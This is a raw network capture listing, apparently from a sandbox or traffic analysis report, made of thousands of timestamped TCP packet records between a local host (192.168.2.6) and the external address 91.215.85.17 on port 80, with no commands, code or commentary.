                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.010860920 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.010895967 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.010902882 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.010931969 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.010967016 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.010977030 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.011003017 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.011039972 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.011045933 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.011075020 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.011110067 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.011116982 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.011146069 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.011182070 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.011188984 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.011218071 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.011254072 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.011271000 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.011287928 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.011290073 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.011326075 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.011334896 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.011362076 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.011395931 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.011405945 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.011432886 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.011467934 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.011482954 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.011503935 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.011540890 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.011548996 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.011578083 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.011612892 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.011629105 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.011651039 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.011687040 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.011696100 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.011723042 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.011758089 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.011769056 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.011794090 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.011827946 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.011836052 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.011862993 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.011898041 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.011905909 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.011933088 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.011967897 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.011987925 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012002945 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012037992 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012046099 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012073994 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012109995 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012123108 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012145996 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012181997 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012196064 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012217999 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012254000 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012264013 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012290955 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012331009 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012339115 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012366056 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012402058 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012411118 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012437105 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012473106 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012480974 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012507915 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012542963 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012552977 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012583017 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012626886 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012636900 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012664080 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012698889 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012711048 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012736082 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012769938 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012778997 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012806892 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012841940 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012851954 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012868881 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012883902 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012900114 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012907982 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012916088 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012932062 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012943029 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012953043 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012953997 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012962103 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012973070 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012981892 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012991905 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.012991905 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013003111 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013011932 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013014078 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013024092 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013032913 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013034105 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013044119 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013052940 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013055086 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013065100 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013073921 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013077974 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013084888 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013094902 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013096094 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013104916 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013114929 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013123989 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013134003 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013134956 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013153076 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013154030 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013164043 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013174057 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013184071 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013194084 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013196945 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013204098 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013217926 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013226986 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013226986 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013247967 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013273954 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013283968 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013286114 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013297081 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013308048 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013318062 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013329029 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013336897 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013339043 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013350010 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013360977 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013361931 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013371944 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013381958 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013382912 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013392925 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013401985 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013403893 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013413906 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013422012 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013425112 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013434887 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013441086 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013444901 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013454914 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013461113 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013464928 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013474941 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013484955 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013484955 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013495922 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013505936 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013509035 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013515949 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013525963 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013536930 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013546944 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013551950 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013559103 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013570070 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013576984 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013581991 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013592005 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013596058 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013602018 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013612986 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013622999 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013633966 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013634920 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013644934 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013654947 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013664961 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013664961 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013674974 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013685942 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013688087 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013695002 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013700962 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013706923 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013716936 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013725996 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013726950 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013736010 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013745070 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013746977 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013757944 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013766050 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013767004 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013778925 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013783932 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013789892 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013819933 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.013839960 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.016081095 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.228136063 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.228194952 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.228285074 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.228898048 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.228936911 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.228974104 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.228979111 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.239212990 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.239260912 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.239289045 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.239300013 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.239337921 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.239341974 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.239373922 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.239412069 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.239419937 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.239448071 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.239481926 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.239485025 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.239517927 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.239553928 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.239554882 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.239592075 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.239625931 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.239626884 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.239661932 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.239698887 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.239701033 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.239736080 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.239772081 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.239773035 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.239806890 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.239840984 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.239845037 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.239876986 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.239911079 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.239913940 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.239944935 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.239984035 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.239984989 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.240025043 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.240061045 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.240062952 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.240096092 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.240129948 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.240130901 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.240165949 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.240200996 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.240205050 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.240236044 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.240271091 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.240272045 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.240305901 CET804972091.215.85.17192.168.2.6
